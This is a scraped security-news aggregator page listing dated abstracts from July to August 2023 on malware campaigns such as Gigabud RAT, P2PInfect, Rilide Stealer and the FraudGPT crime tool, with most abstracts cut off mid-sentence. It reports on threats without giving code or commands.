Account holders of over numerous financial institutions in Thailand, Indonesia, Vietnam, the Philippines, and Peru are being targeted by an Android banking malware called Gigabud RAT . "One of Gigabud RAT's unique features is that it doesn't execute any malicious actions until the user is authorized into the malicious application by a fraudster, [...] which makes it harder to detect," Group-IB researchers Pavel Naumov and Artem Grischenko said . "Instead of using HTML overlay attacks, Gigabud RAT gathers sensitive information primarily through screen recording." Gigabud RAT was first documented by Cyble in January 2023 after it was spotted impersonating bank and government apps to siphon sensitive data. It's known to be active in the wild since at least July 2022. The Singapore-based company said it also identified a second variant of the malware minus the RAT capabilities. Dubbed Gigabud.Loan, it comes under the guise of a loan application thatThe Hacker News
August 14, 2023
QwixxRAT: New Remote Access Trojan Emerges via Telegram and Discord Full Text
Abstract
A new remote access trojan (RAT) called QwixxRAT is being advertised for sale by its threat actor through Telegram and Discord platforms. "Once installed on the victim's Windows platform machines, the RAT stealthily collects sensitive data, which is then sent to the attacker's Telegram bot, providing them with unauthorized access to the victim's sensitive information," Uptycs said in a new report published today. The cybersecurity company, which discovered the malware earlier this month, said it's "meticulously designed" to harvest web browser histories, bookmarks, cookies, credit card information, keystrokes, screenshots, files matching certain extensions, and data from apps like Steam and Telegram. The tool is offered for 150 rubles for weekly access and 500 rubles for a lifetime license. It also comes in a limited free version. A C#-based binary, QwixxRAT comes with various anti-analysis features to remain covert and evade detection. ThiThe Hacker News
August 14, 2023
New Financial Malware ‘JanelaRAT’ Targets Latin American Users Full Text
Abstract
Users in Latin America (LATAM) are the target of a financial malware called JanelaRAT that's capable of capturing sensitive information from compromised Microsoft Windows systems. "JanelaRAT mainly targets financial and cryptocurrency data from LATAM bank and financial institutions," Zscaler ThreatLabz researchers Gaetano Pellegrino and Sudeep Singh said , adding it "abuses DLL side-loading techniques from legitimate sources (like VMWare and Microsoft) to evade endpoint detection." The exact starting point of the infection chain is unclear, but the cybersecurity company, which discovered the campaign in June 2023, said the unknown vector is used to deliver a ZIP archive file containing a Visual Basic Script. The VBScript is engineered to fetch a second ZIP archive from the attackers' server as well as drop a batch file used to establish persistence of the malware. The ZIP archive is packed with two components, the JanelaRAT payload and a legitimateThe Hacker News
August 12, 2023
MacOS Systems Turned Into Proxy Exit Nodes by Adload Full Text
Abstract
AdLoad malware is still infecting Mac systems and has been observed turning infected systems into a giant proxy botnet. AT&T Alien Labs has identified over 10,000 IPs behaving as proxy exit nodes, indicating a potentially widespread infection.Cyware
August 12, 2023
JanelaRAT: Repurposed BX Rat Variant Targeting LATAM FinTech Full Text
Abstract
Zscaler ThreatLabz has discovered a threat actor targeting FinTech users in the LATAM region with a malware called JanelaRAT. This malware uses tactics such as DLL side-loading and dynamic C2 infrastructure.Cyware
August 10, 2023
Statc Stealer, a new sophisticated info-stealing malware Full Text
Abstract
Experts warn that a new info-stealer named Statc Stealer is infecting Windows devices to steal a broad range of sensitive information. Zscaler ThreatLabz researchers discovered a new information stealer malware, called Statc Stealer, that...Security Affairs
August 10, 2023
New Statc Stealer Malware Emerges: Your Sensitive Data at Risk Full Text
Abstract
A new information malware strain called Statc Stealer has been found infecting devices running Microsoft Windows to siphon sensitive personal and payment information. "Statc Stealer exhibits a broad range of stealing capabilities, making it a significant threat," Zscaler ThreatLabz researchers Shivam Sharma and Amandeep Kumar said in a technical report published this week. "It can steal sensitive information from various web browsers, including login data, cookies, web data, and preferences. Additionally, it targets cryptocurrency wallets, credentials, passwords, and even data from messaging apps like Telegram." Written in C++, the malicious stealer finds its way into victim systems when potential victims are tricked into clicking on seemingly innocuous ads, with the stealer imitating an MP4 video file format on web browsers like Google Chrome. The first-stage payload, while dropping and executing a decoy PDF installer, also stealthily deploys a downloaderThe Hacker News
August 9, 2023
Balada Injector still at large – new domains discovered Full Text
Abstract
The Balada Injector is still at large and still evading security software by utilizing new domain names and using new obfuscation. During a routine web monitoring operation, we discovered an address that led us down a rabbit hole of WordPress-orientated...Security Affairs
August 08, 2023
QakBot Malware Operators Expand C2 Network with 15 New Servers Full Text
Abstract
The operators associated with the QakBot (aka QBot) malware have set up 15 new command-and-control (C2) servers as of late June 2023. The findings are a continuation of the malware's infrastructure analysis from Team Cymru, and arrive a little over two months after Lumen Black Lotus Labs revealed that 25% of its C2 servers are only active for a single day. "QakBot has a history of taking an extended break each summer before returning sometime in September, with this year's spamming activities ceasing around 22 June 2023," the cybersecurity firm said . "But are the QakBot operators actually on vacation when they aren't spamming, or is this 'break' a time for them to refine and update their infrastructure and tools?" QakBot's C2 network, like in the case of Emotet and IcedID, is characterized by a tiered architecture in which C2 nodes communicate with upstream Tier 2 (T2) C2 nodes hosted on VPS providers geolocated in Russia. A majoThe Hacker News
August 08, 2023
LOLBAS in the Wild: 11 Living-Off-The-Land Binaries Used for Malicious Purposes Full Text
Abstract
Cybersecurity researchers have discovered a set of 11 living-off-the-land binaries-and-scripts ( LOLBAS ) that could be maliciously abused by threat actors to conduct post-exploitation activities. "LOLBAS is an attack method that uses binaries and scripts that are already part of the system for malicious purposes," Pentera security researcher Nir Chako said . "This makes it hard for security teams to distinguish between legitimate and malicious activities, since they are all performed by trusted system utilities." To that end, the Israeli cybersecurity company said it uncovered nine LOLBAS downloaders and three executors that could enable adversaries to download and execute "more robust malware" on infected hosts. This includes: MsoHtmEd.exe, Mspub.exe, ProtocolHandler.exe, ConfigSecurityPolicy.exe, InstallUtil.exe, Mshta.exe, Presentationhost.exe, Outlook.exe, MSAccess.exe, scp.exe, and sftp.exe. "In a complete attack chain, a hacker will usThe Hacker News
August 8, 2023
Latest Batloader Campaigns Use Pyarmor Pro for Evasion Full Text
Abstract
The Batloader initial access malware, used by the group Water Minyades, has upgraded its evasion techniques by utilizing Pyarmor Pro to obfuscate its malicious Python scripts.Cyware
August 07, 2023
New Malware Campaign Targets Inexperienced Cyber Criminals with OpenBullet Configs Full Text
Abstract
A new malware campaign has been observed making use of malicious OpenBullet configuration files to target inexperienced cyber criminals with the goal of delivering a remote access trojan (RAT) capable of stealing sensitive information. Bot mitigation company Kasada said the activity is designed to "exploit trusted criminal networks," describing it as an instance of advanced threat actors "preying on beginner hackers." OpenBullet is a legitimate open-source pen testing tool used for automating credential stuffing attacks. It takes in a configuration file that's tailored to a specific website and can combine it with a password list procured through other means to log successful attempts. "OpenBullet can be used with Puppeteer, which is a headless browser that can be used for automating web interactions," the company said . "This makes it very easy to launch credential stuffing attacks without having to deal with browser windows popping uThe Hacker News
August 7, 2023
A new sophisticated SkidMap variant targets unsecured Redis servers Full Text
Abstract
A new campaign targets Redis servers, this time the malware employed in the attacks is a new variant of the SkidMap malware. Skidmap is a piece of crypto-miner detected by Trend Micro in September 2019 while it was targeting Linux machines. The malicious...Security Affairs
August 07, 2023
New SkidMap Linux Malware Variant Targeting Vulnerable Redis Servers Full Text
Abstract
Vulnerable Redis services have been targeted by a "new, improved, dangerous" variant of a malware called SkidMap that's engineered to target a wide range of Linux distributions. "The malicious nature of this malware is to adapt to the system on which it is executed," Trustwave security researcher Radoslaw Zdonczyk said in an analysis published last week. Some of the Linux distribution SkidMap sets its eyes on include Alibaba, Anolis, openEuler, EulerOS, Stream, CentOS, RedHat, and Rocky. SkidMap was first disclosed by Trend Micro in September 2019 as a cryptocurrency mining botnet with capabilities to load malicious kernel modules that can obfuscate its activities as well as monitor the miner process. The operators of the malware have also been found camouflaging their backup command-and-control (C2) IP address on the Bitcoin blockchain, evocative of another botnet malware known as Glupteba . "The technique of fetching real-time data from a deThe Hacker News
August 7, 2023
Reptile Rootkit Targets Linux Systems in South Korea Full Text
Abstract
Reptile, an open-source kernel module rootkit, designed to target Linux systems was found on GitHub. Unlike typical rootkit malware, Reptile not only conceals its presence but also offers a reverse shell, granting threat actors control over compromised systems. I t is crucial to regularly inspect ... Read MoreCyware
August 05, 2023
Reptile Rootkit: Advanced Linux Malware Targeting South Korean Systems Full Text
Abstract
Threat actors are using an open-source rootkit called Reptile to target Linux systems in South Korea. "Unlike other rootkit malware that typically only provide concealment capabilities, Reptile goes a step further by offering a reverse shell, allowing threat actors to easily take control of systems," the AhnLab Security Emergency Response Center (ASEC) said in a report published this week. "Port knocking is a method where the malware opens a specific port on an infected system and goes on standby. When the threat actor sends a magic packet to the system, the received packet is used as a basis to establish a connection with the C&C server." A rootkit is a malicious software program that's designed to provide privileged, root-level access to a machine while concealing its presence. At least four different campaigns have leveraged Reptile since 2022. The first use of the rootkit was recorded by Trend Micro in May 2022 in connection with an intrusionThe Hacker News
August 4, 2023
Rilide Stealer Evolves to Target Chrome Extension Manifest V3 Full Text
Abstract
A rather sophisticated version of the Rilide malware was identified targeting Chromium-based web browsers to steal sensitive data and cryptocurrency. Experts identified over 1,300 phishing websites distributing the new version of Rilide Stealer along with other harmful malware such as Bu ... Read MoreCyware
August 04, 2023
Malicious npm Packages Found Exfiltrating Sensitive Data from Developers Full Text
Abstract
Cybersecurity researchers have discovered a new bunch of malicious packages on the npm package registry that are designed to exfiltrate sensitive developer information. Software supply chain firm Phylum, which first identified the "test" packages on July 31, 2023, said they "demonstrated increasing functionality and refinement," hours after which they were removed and re-uploaded under different, legitimate-sounding package names. While the end goal of the undertaking is not clear, it's suspected to be a highly targeted campaign aimed at the cryptocurrency sector based on references to modules such as "rocketrefer" and "binarium." All the packages were published by the npm user malikrukd4732. A common feature across all the modules is the ability to launch JavaScript ("index.js") that's equipped to exfiltrate valuable information to a remote server. "The index.js code is spawned in a child process by the preinstall.jThe Hacker News
August 4, 2023
Malicious packages in the NPM designed for highly-targeted attacks Full Text
Abstract
Researchers discovered a new set of malicious packages on the npm package manager that can exfiltrate sensitive developer data. On July 31, 2023, Phylum researchers observed the publication of ten different "test" packages on the npm package manager...Security Affairs
August 03, 2023
Malicious Apps Use Sneaky Versioning Technique to Bypass Google Play Store Scanners Full Text
Abstract
Threat actors are leveraging a technique called versioning to evade Google Play Store's malware detections and target Android users. "Campaigns using versioning commonly target users' credentials, data, and finances," Google Cybersecurity Action Team (GCAT) s aid in its August 2023 Threat Horizons Report shared with The Hacker News. While versioning is not a new phenomenon, it's sneaky and hard to detect. In this method, a developer releases an initial version of an app on the Play Store that passes Google's pre-publication checks, but is later updated with a malware component. This is achieved by pushing an update from an attacker-controlled server to serve malicious code on the end user device using a method called dynamic code loading (DCL), effectively turning the app into a backdoor. Earlier this May, ESET discovered a screen recording app named "iRecorder - Screen Recorder" that remained innocuous for nearly a year after it was firstThe Hacker News
August 03, 2023
New Version of Rilide Data Theft Malware Adapts to Chrome Extension Manifest V3 Full Text
Abstract
Cybersecurity researchers have discovered a new version of malware called Rilide that targets Chromium-based web browsers to steal sensitive data and steal cryptocurrency. "It exhibits a higher level of sophistication through modular design, code obfuscation, adoption to the Chrome Extension Manifest V3 , and additional features such as the ability to exfiltrate stolen data to a Telegram channel or interval-based screenshot captures," Trustwave security researcher Pawel Knapczyk said in a report shared with The Hacker News. Rilide was first documented by the cybersecurity company in April 2023, uncovering two different attack chains that made use of Ekipa RAT and Aurora Stealer to deploy rogue browser extensions capable of data and crypto theft. It's sold on dark web forums by an actor named "friezer" for $5,000. The malware is equipped with a wide range of features that allow it to disable other browser add-ons, harvest browsing history and cookies,The Hacker News
August 3, 2023
New Variants of NodeStealer Found Infecting Facebook Business Accounts Full Text
Abstract
Unit 42 researchers discovered a previously unreported phishing campaign targeting Facebook business accounts. The campaign distributed new variants of NodeStealer malware that could fully take over these accounts, steal cryptocurrency, and download further payloads. This type of attack can cause b ... Read MoreCyware
August 01, 2023
New NodeStealer Targeting Facebook Business Accounts and Crypto Wallets Full Text
Abstract
Cybersecurity researchers have unearthed a Python variant of a stealer malware NodeStealer that's equipped to fully take over Facebook business accounts as well as siphon cryptocurrency. Palo Alto Network Unit 42 said it detected the previously undocumented strain as part of a campaign that commenced in December 2022. NodeStealer was first exposed by Meta in May 2023, describing it as a stealer capable of harvesting cookies and passwords from web browsers to compromise Facebook, Gmail, and Outlook accounts. While the prior samples were written in JavaScript, the latest versions are coded in Python. "NodeStealer poses great risk for both individuals and organizations," Unit 42 researcher Lior Rochberger said . "Besides the direct impact on Facebook business accounts, which is mainly financial, the malware also steals credentials from browsers, which can be used for further attacks." The attacks start with bogus messages on Facebook that purportedly claiThe Hacker News
August 1, 2023
NodeStealer 2.0 takes over Facebook Business accounts and targets crypto wallets Full Text
Abstract
Researchers spotted a Python variant of the NodeStealer that was designed to take over Facebook business accounts and cryptocurrency wallets. Palo Alto Network Unit 42 discovered a previously unreported phishing campaign that distributed...Security Affairs
August 1, 2023
WikiLoader malware-as-a-service targets Italian organizations Full Text
Abstract
Threat actors are targeting Italian organizations with a phishing campaign aimed at delivering a new malware called WikiLoader. WikiLoader is a new piece of malware that is employed in a phishing campaign that is targeting Italian organizations....Security Affairs
July 31, 2023
New P2PInfect Worm Targets Redis Servers with Undocumented Breach Methods Full Text
Abstract
The P2PInfect peer-to-peer (P2) worm has been observed employing previously undocumented initial access methods to breach susceptible Redis servers and rope them into a botnet. "The malware compromises exposed instances of the Redis data store by exploiting the replication feature," Cado Security researchers Nate Bill and Matt Muir said in a report shared with The Hacker News. "A common attack pattern against Redis in cloud environments is to exploit this feature using a malicious instance to enable replication. This is achieved via connecting to an exposed Redis instance and issuing the SLAVEOF command." The Rust-based malware was first documented by Palo Alto Networks Unit 42, calling out the malware's ability to exploit a critical Lua sandbox escape vulnerability ( CVE-2022-0543 , CVSS score: 10.0) to obtain a foothold into Redis instances. The campaign is believed to have commenced on or after June 29, 2023. However, the latest discovery suggests thThe Hacker News
July 31, 2023
Experts discovered a previously undocumented initial access vector used by P2PInfect worm Full Text
Abstract
Cado Security observed a new variant of the P2PInfect worm targets Redis servers with a previously undocumented initial access vector. In July, Palo Alto Networks Unit 42 researchers discovered a new peer-to-peer (P2P) worm called P2PInfect that...Security Affairs
July 31, 2023
Fruity Trojan Uses Deceptive Software Installers to Spread Remcos RAT Full Text
Abstract
Threat actors are creating fake websites hosting trojanized software installers to trick unsuspecting users into downloading a downloader malware called Fruity with the goal of installing remote trojans tools like Remcos RAT. "Among the software in question are various instruments for fine-tuning CPUs, graphic cards, and BIOS; PC hardware-monitoring tools; and some other apps," cybersecurity vendor Doctor Web said in an analysis. "Such installers are used as a decoy and contain not only the software potential victims are interested in, but also the trojan itself with all its components." The exact initial access vector used in the campaign is unclear but it could potentially range from phishing to drive-by downloads to malicious ads. Users who land on the fake site are prompted to download a ZIP installer package. The installer, besides activating the standard installation process, stealthily drops the Fruity trojan, a Python-based malware that unpacks an MPThe Hacker News
July 29, 2023
New Android Malware CherryBlos Utilizing OCR to Steal Sensitive Data Full Text
Abstract
A new Android malware strain called CherryBlos has been observed making use of optical character recognition (OCR) techniques to gather sensitive data stored in pictures. CherryBlos, per Trend Micro , is distributed via bogus posts on social media platforms and comes with capabilities to steal cryptocurrency wallet-related credentials and act as a clipper to substitute wallet addresses when a victim copies a string matching a predefined format is copied to the clipboard. Once installed, the apps seek users' permissions to grant it accessibility permissions, which allows it to automatically grant itself additional permissions as required. As a defense evasion measure, users attempting to kill or uninstall the app by entering the Settings app are redirected back to the home screen. Besides displaying fake overlays on top of legitimate crypto wallet apps to steal credentials and make fraudulent fund transfers to an attacker-controlled address, CherryBlos utilizes OCR to recogThe Hacker News
July 29, 2023
Update: More Malicious NPM Packages Found in Wake of Jumpcloud Supply Chain Hack Full Text
Abstract
An investigation by ReversingLabs researchers has uncovered evidence of more malicious npm packages, with links to the same infrastructure that also appear to target cryptocurrency providers.Cyware
July 29, 2023
Now Abyss Locker also targets VMware ESXi servers Full Text
Abstract
A Linux variant of the Abyss Locker designed to target VMware ESXi servers appeared in the threat landscape, experts warn. The operators behind the Abyss Locker developed a Linux variant that targets VMware ESXi servers expanding their potential targets. VMware...Security Affairs
July 28, 2023
IcedID Malware Adapts and Expands Threat with Updated BackConnect Module Full Text
Abstract
The threat actors linked to the malware loader known as IcedID have made updates to the BackConnect (BC) module that's used for post-compromise activity on hacked systems, new findings from Team Cymru reveal. IcedID, also called BokBot , is a strain of malware similar to Emotet and QakBot that started off as a banking trojan in 2017, before switching to the role of an initial access facilitator for other payloads. Recent versions of the malware have been observed removing functionality related to online banking fraud to prioritize ransomware delivery. The BackConnect (BC) module, first documented by Netresec in October 2022, relies on a proprietary command-and-control (C2) protocol to exchange commands between a server and the infected host. The protocol, which comes with a VNC component for remote access, has also been identified in other malware such as the now-discontinued BazarLoader and QakBot. In December 2022, Team Cymru reported the discovery of 11 BC C2s aThe Hacker News
July 28, 2023
Related CherryBlos and FakeTrade Android Malware Involved in Scam Campaigns Full Text
Abstract
The CherryBlos malware steals cryptocurrency wallet credentials and replaces withdrawal addresses, while the FakeTrade malware tricks users into downloading apps that promise increased income but prevent fund withdrawals.Cyware
July 27, 2023
Introducing FraudGPT: The Latest AI Cybercrime Tool in the Dark Web Full Text
Abstract
In the wake of WormGPT's success, threat actors have now introduced another AI-powered cybercrime tool called FraudGPT . This AI bot is being promoted on numerous dark web marketplaces and Telegram channels, and is capable of designing spear-phishing emails, generating cracking tools, and facilit ... Read MoreCyware
July 27, 2023
Decoy Dog Malware Evolves to Expand its Reach Full Text
Abstract
An unidentified nation-state appears to be preparing for a new hacking campaign, according to researchers at Infoblox. The campaign uses the relatively new Decoy Dog malware toolkit. Decoy Dog has undergone a major upgrade from Pupy , an open-source remote access tool, to disguise its activities ... Read MoreCyware
July 26, 2023
Decoy Dog: New Breed of Malware Posing Serious Threats to Enterprise Networks Full Text
Abstract
A deeper analysis of a recently discovered malware called Decoy Dog has revealed that it's a significant upgrade over the Pupy RAT , an open-source remote access trojan it's modeled on. "Decoy Dog has a full suite of powerful, previously unknown capabilities – including the ability to move victims to another controller, allowing them to maintain communication with compromised machines and remain hidden for long periods of time," Infoblox said in a Tuesday report. "Some victims have actively communicated with a Decoy Dog server for over a year." Other new features allow the malware to execute arbitrary Java code on the client and connect to emergency controllers using a mechanism that's similar to a traditional DNS domain generation algorithm ( DGA ), with the Decoy Dog domains engineered to respond to replayed DNS queries from breached clients. The sophisticated toolkit was first discovered by the cybersecurity firm in early April 2023 afterThe Hacker News
July 26, 2023
FraudGPT, a new malicious generative AI tool appears in the threat landscape Full Text
Abstract
FraudGPT is another cybercrime generative artificial intelligence (AI) tool that is advertised in the hacking underground. Generative AI models are becoming attractive for crooks, Netenrich researchers recently spotted a new platform dubbed FraudGPT...Security Affairs
July 26, 2023
New AI Tool ‘FraudGPT’ Emerges, Tailored for Sophisticated Attacks Full Text
Abstract
Following the footsteps of WormGPT , threat actors are advertising yet another cybercrime generative artificial intelligence (AI) tool dubbed FraudGPT on various dark web marketplaces and Telegram channels. "This is an AI bot, exclusively targeted for offensive purposes, such as crafting spear phishing emails, creating cracking tools, carding, etc.," Netenrich security researcher Rakesh Krishnan said in a report published Tuesday. The cybersecurity firm said the offering has been circulating since at least July 22, 2023, for a subscription cost of $200 a month (or $1,000 for six months and $1,700 for a year). "If your [sic] looking for a Chat GPT alternative designed to provide a wide range of exclusive tools, features, and capabilities tailored to anyone's individuals with no boundaries then look no further!," claims the actor, who goes by the online alias CanadianKingpin. The author also states that the tool could be used to write malicious code, cThe Hacker News
July 26, 2023
Rust-based Realst Infostealer Targeting Apple macOS Users’ Cryptocurrency Wallets Full Text
Abstract
A new malware family called Realst has become the latest to target Apple macOS systems, with a third of the samples already designed to infect macOS 14 Sonoma, the upcoming major release of the operating system. Written in the Rust programming language, the malware is distributed in the form of bogus blockchain games and is capable of "emptying crypto wallets and stealing stored password and browser data" from both Windows and macOS machines. Realst was first discovered in the wild by security researcher iamdeadlyz . "Realst Infostealer is distributed via malicious websites advertising fake blockchain games with names such as Brawl Earth, WildWorld, Dawnland, Destruction, Evolion, Pearl, Olymp of Reptiles, and SaintLegend," SentinelOne security researcher Phil Stokes said in a report. "Each version of the fake blockchain game is hosted on its own website complete with associated Twitter and Discord accounts." The cybersecurity firm, which identifThe Hacker News
July 26, 2023
New Realst Info-stealer Targets MacOS, Empties Crypto Wallets Full Text
Abstract
In the ever-evolving information-stealer landscape, a new malware dubbed Realst has emerged. Realst is designed to target macOS systems and is capable of emptying crypto wallets and stealing stored passwords and browser data. A ttackers are using tricks to lure gamers with money, which is a red ... Read MoreCyware
July 25, 2023
Spyhide Stalkerware is Spying on Tens of Thousands of Phones Full Text
Abstract
Spyhide is secretly collecting private data from tens of thousands of Android devices worldwide. The app is often installed on a victim's phone by someone who knows their passcode, and it remains hidden on the home screen.Cyware
July 25, 2023
Casbaneiro Banking Malware Goes Under the Radar with UAC Bypass Technique Full Text
Abstract
The financially motivated threat actors behind the Casbaneiro banking malware family have been observed making use of a User Account Control ( UAC ) bypass technique to gain full administrative privileges on a machine, a sign that the threat actor is evolving their tactics to avoid detection and execute malicious code on compromised assets. "They are still heavily focused on Latin American financial institutions, but the changes in their techniques represent a significant risk to multi-regional financial organizations as well," Sygnia said in a statement shared with The Hacker News. Casbaneiro , also known as Metamorfo and Ponteiro, is best known for its banking trojan, which first emerged in mass email spam campaigns targeting the Latin American financial sector in 2018. Infection chains typically begin with a phishing email pointing to a booby-trapped attachment that, when launched, activates a series of steps that culminate in the deployment of the banking malwareThe Hacker News
July 21, 2023
HotRat: New Variant of AsyncRAT Malware Spreading Through Pirated Software Full Text
Abstract
A new variant of AsyncRAT malware dubbed HotRat is being distributed via free, pirated versions of popular software and utilities such as video games, image and sound editing software, and Microsoft Office. "HotRat malware equips attackers with a wide array of capabilities, such as stealing login credentials, cryptocurrency wallets, screen capturing, keylogging, installing more malware, and gaining access to or altering clipboard data," Avast security researcher Martin a Milánek said . The Czech cybersecurity firm said the trojan has been prevalent in the wild since at least in October 2022, with a majority of the infections concentrated in Thailand, Guyana, Libya, Suriname, Mali, Pakistan, Cambodia, South Africa, and India. The attacks entail bundling the cracked software available online via torrent sites with a malicious AutoHotkey ( AHK ) script that initiates an infection chain designed to deactivate antivirus solutions on the compromised host and ultimately laThe Hacker News
July 21, 2023
HotRat as Hidden Script in Cracked Software Full Text
Abstract
In a recent encounter, security researchers stumbled across a HotRat malware distribution campaign that cybercriminals were offering bundled as cracked programs and games. HotRat is an offshoot of the open-source AsyncRAT framework. Implement strict software policies, regularly update and patch sys ... Read MoreCyware
July 21, 2023
Sophisticated BundleBot Malware Disguised as Google AI Chatbot and Utilities Full Text
Abstract
A new malware strain known as BundleBot has been stealthily operating under the radar by taking advantage of .NET single-file deployment techniques , enabling threat actors to capture sensitive information from compromised hosts. "BundleBot is abusing the dotnet bundle (single-file), self-contained format that results in very low or no static detection at all," Check Point said in a report published this week, adding it is "commonly distributed via Facebook Ads and compromised accounts leading to websites masquerading as regular program utilities, AI tools, and games." Some of these websites aim to mimic Google Bard, the company's conversational generative artificial intelligence chatbot, enticing victims into downloading a bogus RAR archive ("Google_AI.rar") hosted on legitimate cloud storage services such as Dropbox. The archive file, when unpacked, contains an executable file ("GoogleAI.exe"), which is the .NET single-file, self-conThe Hacker News
July 20, 2023
P2PInfect, a Rusty P2P worm targets Redis Servers on Linux and Windows systems Full Text
Abstract
Cybersecurity researchers discovered a new peer-to-peer (P2P) worm called P2PInfect that targets Redis servers. Palo Alto Networks Unit 42 researchers have discovered a new peer-to-peer (P2P) worm called P2PInfect that targets...Security Affairs
July 20, 2023
New P2PInfect Worm Targeting Redis Servers on Linux and Windows Systems Full Text
Abstract
Cybersecurity researchers have uncovered a new cloud targeting, peer-to-peer (P2P) worm called P2PInfect that targets vulnerable Redis instances for follow-on exploitation. "P2PInfect exploits Redis servers running on both Linux and Windows Operating Systems making it more scalable and potent than other worms," Palo Alto Networks Unit 42 researchers William Gamazo and Nathaniel Quist said . "This worm is also written in Rust, a highly scalable and cloud-friendly programming language." It's estimated that as many as 934 unique Redis systems may be vulnerable to the threat. The first known instance of P2PInfect was detected on July 11, 2023. A notable characteristic of the worm is its ability to infects vulnerable Redis instances by exploiting a critical Lua sandbox escape vulnerability, CVE-2022-0543 (CVSS score: 10.0), which has been previously exploited to deliver multiple malware families such as Muhstik , Redigo , and HeadCrab over the past yeThe Hacker News
July 17, 2023
Update: Google Removes Swing VPN Android App Exposed as DDoS Botnet Full Text
Abstract
The incident serves as a reminder that even seemingly legitimate apps can harbor dangerous intentions, highlighting the importance of staying informed and vigilant against cyber threats.Cyware
July 17, 2023
New AVrecon Malware Infects 70,000 Linux Routers Across 20 Countries Full Text
Abstract
A stealthy Linux malware, dubbed AVrecon, was found targeting more than 70,000 Linux-based SOHO routers at least since May 2021. It reportedly hijacked these devices to form a botnet that could steal bandwidth and provide a hidden residential proxy service. A total of 15 second-stage control server ... Read MoreCyware
July 16, 2023
WormGPT, the generative AI tool to launch sophisticated BEC attacks Full Text
Abstract
The WormGPT case: How Generative artificial intelligence (AI) can improve the capabilities of cybercriminals and allows them to launch sophisticated attacks. Researchers from SlashNext warn of the dangers related to a new generative AI cybercrime...Security Affairs
July 15, 2023
Meet CustomerLoader: A Multifaceted Malware Unleashing Diverse Payloads Full Text
Abstract
An unreported .NET loader referred to as CustomerLoader is being distributed through deceptive phishing emails, YouTube videos, and web pages that mimicked genuine websites. This loader possesses the capability to retrieve, decrypt, and execute additional payloads.Cyware
July 14, 2023
New SOHO Router Botnet AVrecon Spreads to 70,000 Devices Across 20 Countries Full Text
Abstract
A new malware strain has been found covertly targeting small office/home office (SOHO) routers for more than two years, infiltrating over 70,000 devices and creating a botnet with 40,000 nodes spanning 20 countries. Lumen Black Lotus Labs has dubbed the malware AVrecon , making it the third such strain to focus on SOHO routers after ZuoRAT and HiatusRAT over the past year. "This makes AVrecon one of the largest SOHO router-targeting botnets ever seen," the company said . "The purpose of the campaign appears to be the creation of a covert network to quietly enable a range of criminal activities from password spraying to digital advertising fraud." A majority of the infections are located in the U.K. and the U.S., followed by Argentina, Nigeria, Brazil, Italy, Bangladesh, Vietnam, India, Russia, and South Africa, among others. AVrecon was first highlighted by Kaspersky senior security researcher Ye (Seth) Jin in May 2021, indicating that the malware hasThe Hacker News
July 13, 2023
PicassoLoader Malware Used in Ongoing Attacks on Ukraine and Poland Full Text
Abstract
Government entities, military organizations, and civilian users in Ukraine and Poland have been targeted as part of a series of campaigns designed to steal sensitive data and gain persistent remote access to the infected systems. The intrusion set, which stretches from April 2022 to July 2023, leverages phishing lures and decoy documents to deploy a downloader malware called PicassoLoader, which acts as a conduit to launch Cobalt Strike Beacon and njRAT. "The attacks used a multistage infection chain initiated with malicious Microsoft Office documents, most commonly using Microsoft Excel and PowerPoint file formats," Cisco Talos researcher Vanja Svajcer said in a new report. "This was followed by an executable downloader and payload concealed in an image file, likely to make its detection more difficult." Some of the activities have been attributed to a threat actor called GhostWriter (aka UAC-0057 or UNC1151), whose priorities are said to align with the BeThe Hacker News
July 13, 2023
New Attack Drops LokiBot Malware via Malicious Macros in Word Documents Full Text
Abstract
FortiGuard Labs recently uncovered a concerning discovery in their investigation, revealing a series of malicious Microsoft Office documents designed to take advantage of well-known vulnerabilities.Cyware
July 11, 2023
New TOITOIN Trojan Targets LATAM Full Text
Abstract
Businesses in the Latin American region are facing a new threat from a sophisticated malicious campaign distributing the TOITOIN trojan. Moreover, the campaign uses Amazon EC2 instances to evade domain-based detections. It is crucial for organizations to maintain a high level of vigilance against e ... Read MoreCyware
July 11, 2023
Purr-fectly Crafted for Macs: Charming Kitten Introduces NokNok Malware Full Text
Abstract
Security researchers uncovered a new campaign by Charming Kitten (APT42) targeting Windows and macOS systems using different malware payloads. A new type of malware called NokNok, is specifically used for targeting macOS systems. For Windows, adversaries leverage PowerShell code and an LNK file to ... Read MoreCyware
July 11, 2023
Six Malicious Python Packages in the PyPI Targeting Windows Users Full Text
Abstract
The attackers imitated the W4SP attack group by using custom entry points and leveraging free file hosting services to remain undetected during the installation or execution process.Cyware
July 10, 2023
VMware warns of exploit available for critical vRealize RCE bug Full Text
Abstract
VMware warned customers today that exploit code is now available for a critical vulnerability in the VMware Aria Operations for Logs analysis tool, which helps admins manage terabytes worth of app and infrastructure logs in large-scale environments.BleepingComputer
July 10, 2023
New TOITOIN Banking Trojan Targeting Latin American Businesses Full Text
Abstract
Businesses operating in the Latin American (LATAM) region are the target of a new Windows-based banking trojan called TOITOIN since May 2023. "This sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilizing specially crafted modules throughout each stage," Zscaler researchers Niraj Shivtarkar and Preet Kamal said in a report published last week. "These modules are custom designed to carry out malicious activities, such as injecting harmful code into remote processes, circumventing User Account Control via COM Elevation Moniker, and evading detection by Sandboxes through clever techniques like system reboots and parent process checks." The six-stage endeavor has all the hallmarks of a well-crafted attack sequence, beginning with a phishing email containing an embedded link that points to a ZIP archive hosted on an Amazon EC2 instance to evade domain-based detections. The email messages leverage an invoice-themed lure to tThe Hacker News
July 9, 2023
Two spyware sending data of more than 1.5M users to China were found in Google Play Store Full Text
Abstract
Two apps on the Google Play Store with more than 1.5 million downloads have been discovered spying on users and sending data to China. Researchers from cybersecurity firm Pradeo discovered two malicious apps on Google Play hinding spyware and spying...Security Affairs
July 8, 2023
WISE REMOTE Stealer Unleashed : Unveiling Its Multifaceted Malicious Arsenal Full Text
Abstract
The WISE REMOTE Stealer is an advanced information stealer and Remote Access Trojan (RAT) that is coded in the Go programming language and utilizes code manipulation techniques to evade antivirus detection, making it difficult to detect and mitigate.Cyware
July 07, 2023
Cybersecurity Agencies Sound Alarm on Rising TrueBot Malware Attacks Full Text
Abstract
